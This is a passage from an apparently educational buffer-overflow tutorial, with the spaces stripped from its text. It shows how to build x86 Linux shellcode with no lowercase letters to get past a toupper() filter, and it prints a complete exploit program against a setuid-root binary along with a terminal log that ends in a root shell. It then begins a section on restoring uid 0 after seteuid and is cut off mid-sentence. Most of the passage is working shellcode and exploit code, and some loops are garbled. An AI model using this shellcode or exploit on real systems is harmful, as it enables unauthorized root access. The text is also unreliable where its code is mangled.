argv[1][i]=toupper(argv[1][i]);
strcpy(buffer,argv[1]);
}
}
----------------------------------------------------------------------------
Thisvulnerableprogramconvertssmalllettersintocapitallettersofthe
userinput.Therefore,youhavetomakeashellcodewhichdoesn'tcontainany
smallletters.Howcanyoudothat?
Youhavetoreferencethecharacterstring
"/bin/sh"whichmustcontainsmallletters.However,youcanexploitthis.:
)
3.2Modifythenormalshellcode
Almostallbufferoverflowexploitcodeusesthisshellcode.Nowyouhave
toremoveallsmalllettersintheshellcode.Ofcourse,thenewshellcode
hastoexecuteashell.
normalshellcode
----------------------------------------------------------------------------
charshellcode[]=
"\xeb\x1f"/*jmp0x1f*/
"\x5e"/*popl%esi*/
"\x89\x76\x08"/*movl%esi,0x8(%esi)*/
"\x31\xc0"/*xorl%eax,%eax*/
"\x88\x46\x07"/*movb%eax,0x7(%esi)*/
"\x89\x46\x0c"/*movl%eax,0xc(%esi)*/
"\xb0\x0b"/*movb$0xb,%al*/
"\x89\xf3"/*movl%esi,%ebx*/
"\x8d\x4e\x08"/*leal0x8(%esi),%ecx*/
"\x8d\x56\x0c"/*leal0xc(%esi),%edx*/
"\xcd\x80"/*int$0x80*/
"\x31\xdb"/*xorl%ebx,%ebx*/
"\x89\xd8"/*movl%ebx,%eax*/
"\x40"/*inc%eax*/
"\xcd\x80"/*int$0x80*/
"\xe8\xdc\xff\xff\xff"/*call-0x24*/
"/bin/sh";/*.string\"/bin/sh\"*/
----------------------------------------------------------------------------
Thisshellcodehas6smallletters.(5smalllettersinthe"/bin/sh"and
1smallletterin"movl%esi,0x8(%esi)")
Youcannotuse"/bin/sh"characterstringdirectlytopassthroughthe
filter.However,youcaninsertanycharactersexceptforsmallcharacters.
Therefore,youcaninsert"\x2f\x12\x19\x1e\x2f\x23\x18"insteadof
"\x2f\x62\x69\x6e\x2f\x73\x68"("/bin/sh").Afteryouoverflowthebuffer
youhavetochange"\x2f\x12\x19\x1e\x2f\x23\x18"into
"\x2f\x62\x69\x6e\x2f\x73\x68"toexecute"/bin/sh".Youcanchangeeasily
byadding\x50to\x62,\x69,\x6e,\x73,and\x68whenyourshellcode
isexecuted.Thenhowcanyouhide\x76in"movl%esi,0x8(%esi)"?
You
canchange"movl%esi,0x8(%esi)"intootherinstructionsthatdotheequivalent
instructionanddonotcontainanysmallletters.Forexample,
"movl%esi,0x8(%esi)"canbechangedinto"movl%esi,%eax","addl$0x8,%eax",
"movl%eax,0x8(%esi)".Thechangedinstructionshaveanysmallletters.
(Ithinkothergoodinstructionstodosamething.It'sjustanexample.)
Nowthenewshellcodeismade.
newshellcode
----------------------------------------------------------------------------
charshellcode[]=
"\xeb\x38"/*jmp0x38*/
"\x5e"/*popl%esi*/
"\x80\x46\x01\x50"/*addb$0x50,0x1(%esi)*/
"\x80\x46\x02\x50"/*addb$0x50,0x2(%esi)*/
"\x80\x46\x03\x50"/*addb$0x50,0x3(%esi)*/
"\x80\x46\x05\x50"/*addb$0x50,0x5(%esi)*/
"\x80\x46\x06\x50"/*addb$0x50,0x6(%esi)*/
"\x89\xf0"/*movl%esi,%eax*/
"\x83\xc0\x08"/*addl$0x8,%eax*/
"\x89\x46\x08"/*movl%eax,0x8(%esi)*/
"\x31\xc0"/*xorl%eax,%eax*/
"\x88\x46\x07"/*movb%eax,0x7(%esi)*/
"\x89\x46\x0c"/*movl%eax,0xc(%esi)*/
"\xb0\x0b"/*movb$0xb,%al*/
"\x89\xf3"/*movl%esi,%ebx*/
"\x8d\x4e\x08"/*leal0x8(%esi),%ecx*/
"\x8d\x56\x0c"/*leal0xc(%esi),%edx*/
"\xcd\x80"/*int$0x80*/
"\x31\xdb"/*xorl%ebx,%ebx*/
"\x89\xd8"/*movl%ebx,%eax*/
"\x40"/*inc%eax*/
"\xcd\x80"/*int$0x80*/
"\xe8\xc3\xff\xff\xff"/*call-0x3d*/
"\x2f\x12\x19\x1e\x2f\x23\x18";/*.string"/bin/sh"*/
/*/bin/shisdisguised*/
----------------------------------------------------------------------------
3.3Exploitvulnerable1program
Withthisshellcode,youcanmakeanexploitcodeeasily.
exploit1.c
----------------------------------------------------------------------------
#include
#include
#defineALIGN0
#defineOFFSET0
#defineRET_POSITION1024
#defineRANGE20
#defineNOP0x90
charshellcode[]=
"\xeb\x38"/*jmp0x38*/
"\x5e"/*popl%esi*/
"\x80\x46\x01\x50"/*addb$0x50,0x1(%esi)*/
"\x80\x46\x02\x50"/*addb$0x50,0x2(%esi)*/
"\x80\x46\x03\x50"/*addb$0x50,0x3(%esi)*/
"\x80\x46\x05\x50"/*addb$0x50,0x5(%esi)*/
"\x80\x46\x06\x50"/*addb$0x50,0x6(%esi)*/
"\x89\xf0"/*movl%esi,%eax*/
"\x83\xc0\x08"/*addl$0x8,%eax*/
"\x89\x46\x08"/*movl%eax,0x8(%esi)*/
"\x31\xc0"/*xorl%eax,%eax*/
"\x88\x46\x07"/*movb%eax,0x7(%esi)*/
"\x89\x46\x0c"/*movl%eax,0xc(%esi)*/
"\xb0\x0b"/*movb$0xb,%al*/
"\x89\xf3"/*movl%esi,%ebx*/
"\x8d\x4e\x08"/*leal0x8(%esi),%ecx*/
"\x8d\x56\x0c"/*leal0xc(%esi),%edx*/
"\xcd\x80"/*int$0x80*/
"\x31\xdb"/*xorl%ebx,%ebx*/
"\x89\xd8"/*movl%ebx,%eax*/
"\x40"/*inc%eax*/
"\xcd\x80"/*int$0x80*/
"\xe8\xc3\xff\xff\xff"/*call-0x3d*/
"\x2f\x12\x19\x1e\x2f\x23\x18";/*.string"/bin/sh"*/
/*/bin/shisdisguised*/
unsignedlongget_sp(void)
{
__asm__("movl%esp,%eax");
}
main(intargc,char**argv)
{
charbuff[RET_POSITION+RANGE+ALIGN+1],*ptr;
longaddr;
unsignedlongsp;
intoffset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
inti;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
for(i=0;i{
buff[i+ALIGN]=(addr&0x000000ff);
buff[i+ALIGN+1]=(addr&0x0000ff00)>>8;
buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
buff[i+ALIGN+3]=(addr&0xff000000)>>24;
}
for(i=0;ibuff[i]=NOP;
ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i*(ptr++)=shellcode[i];
buff[bsize-1]='\0';
printf("Jumpto0x%08x\n",addr);
execl("./vulnerable1","vulnerable1",buff,0);
}
----------------------------------------------------------------------------
exploitthevulnerable1program
----------------------------------------------------------------------------
[ohhara@ohhara~]{1}$ls-lvulnerable1
-rwsr-xr-x1rootroot4342Oct1813:
20vulnerable1*
[ohhara@ohhara~]{2}$ls-lexploit1
-rwxr-xr-x1ohharacse6932Oct1813:
20exploit1*
[ohhara@ohhara~]{3}$./exploit1
Jumpto0xbfffec64
Segmentationfault
[ohhara@ohhara~]{4}$./exploit1500
Jumpto0xbfffea70
bash#whoami
root
bash#
----------------------------------------------------------------------------
3.4Whatcanyoudowiththistechnique?
Youcanpassthroughvariousformfilterswiththistechnique.Whenthe
vulnerableprogramfilter!
@#$%^&*(),youcanmakethenewshellcodewhich
doesn'tcontain!
@#$%^&*().However,youwillhavedifficultiesinmakinga
shellcode,iftheprogramfiltersmanycharacters.
4Changeuidbackto0
Thesetuidrootprogramwhichknowsthatworkwithrootpermissionisvery
dangerouscallsseteuid(getuid())atstart.Anditcallsseteuid(0)whenitis
needed.Manyprogrammerthinksthatit'ssafeaftercallingseteuid(getuid()).
However,it'snottrue.Theuidcanbebackto0.
4.1Theexamplevulnerableprogram
vulnerable2.c
----------------------------------------------------------------------------
#include
#include
intmain(intargc,char**argv)
{
charbuffer[1024];
seteuid(getuid());
if(argc>1)
strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------
Thisvulnerableprogramcallsseteuid(getuid())atstart.Therefore,you
maythinkthat"strcpy(buffer,argv[1]);"isOK.Becauseyoucanonlyget
yourownshellalthoughyousucceedinbufferoverflowattack.However,
ifyouinsertacodewhichcallssetuid(0)intheshellcode,youcanget
rootshell.:
)
4.2Makesetuid(0)code
setuidasm.c
----------------------------------------------------------------------------
main()
{
setuid(0);
}
----------------------------------------------------------------------------
compilean